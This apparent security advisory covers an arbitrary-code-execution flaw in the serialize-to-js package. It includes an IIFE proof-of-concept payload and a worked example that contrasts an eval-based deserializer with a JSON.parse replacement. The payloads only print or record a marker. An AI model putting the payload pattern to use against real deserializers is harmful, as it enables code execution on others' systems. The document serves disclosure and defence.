Code Execution Through IIFE

2017-02-10T18:56:06
ID NODEJS:313
Type nodejs
Reporter Ajin Abraham
Modified 2018-03-21T22:09:23

Description

Overview

Affected versions of serialize-to-js are vulnerable to arbitrary code execution: deserialize() evaluates its input as JavaScript source rather than parsing it as data, so a string containing an Immediately Invoked Function Expression (IIFE) runs the function body, with the full privileges of the Node.js process, as a side effect of being deserialized.

Proof of Concept

// Attacker-controlled serialized string containing an IIFE; the function
// body runs the moment the string is deserialized.
var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }";
var serialize = require('serialize-to-js');
// Prints "exploited": the IIFE executed inside the deserializing process.
serialize.deserialize(payload);
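
The following is an added example, not code from the advisory or from serialize-to-js. It models the bug class with a hypothetical evalDeserialize() that evaluates its input with new Function (an assumption about the mechanism; it is not the package's source), places a JSON-based safeDeserialize() beside it, and uses a constructed payload that, instead of printing, leaves evidence that it ran with access to the process object.

```javascript
'use strict';

// Deserializer in the vulnerable style: the serialized string is evaluated
// as a JavaScript expression. Assumption: this models the bug class, not
// serialize-to-js's actual implementation.
function evalDeserialize(str) {
  return new Function('return (' + str + ');')();
}

// Hardened replacement: JSON is a data-only grammar, so a function
// expression in the input is a SyntaxError and can never become code.
function safeDeserialize(str) {
  return JSON.parse(str);
}

// Constructed attacker payload. The IIFE stores the process id on
// globalThis and returns a marker, proving the function body executed.
const PAYLOAD =
  "{e: (function(){ globalThis.exploited = process.pid; return 'exploited'; })() }";

// Runs the payload through both deserializers and reports what happened.
function demo() {
  delete globalThis.exploited;
  const viaEval = evalDeserialize(PAYLOAD);

  let safeError = null;
  try {
    safeDeserialize(PAYLOAD);
  } catch (err) {
    safeError = err;
  }

  return {
    evalResult: viaEval.e,                         // 'exploited'
    codeRan: globalThis.exploited === process.pid, // true: IIFE reached process
    safeRejected: safeError instanceof SyntaxError // true: JSON refused the input
  };
}

// Legitimate data still round-trips through the safe path.
function roundTrip(obj) {
  return safeDeserialize(JSON.stringify(obj));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The check a practitioner can apply to any deserializer is the one demo() makes explicit: if a string that is not valid JSON is accepted and produces an object, the library is evaluating code, and wrapping that evaluation in the vm module does not change the verdict, since vm is not a security boundary for untrusted input.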

Recommendation

Update to version 1.0.0 or later, and review the author's disclaimer on deserialize() linked under References. Upgrading does not make a deserializer that evaluates JavaScript safe for attacker-controlled input: never pass untrusted strings to deserialize(), and prefer a data-only format such as JSON (JSON.parse) where the input can come from outside a trust boundary.

References

https://www.npmjs.com/package/serialize-to-js#deserialize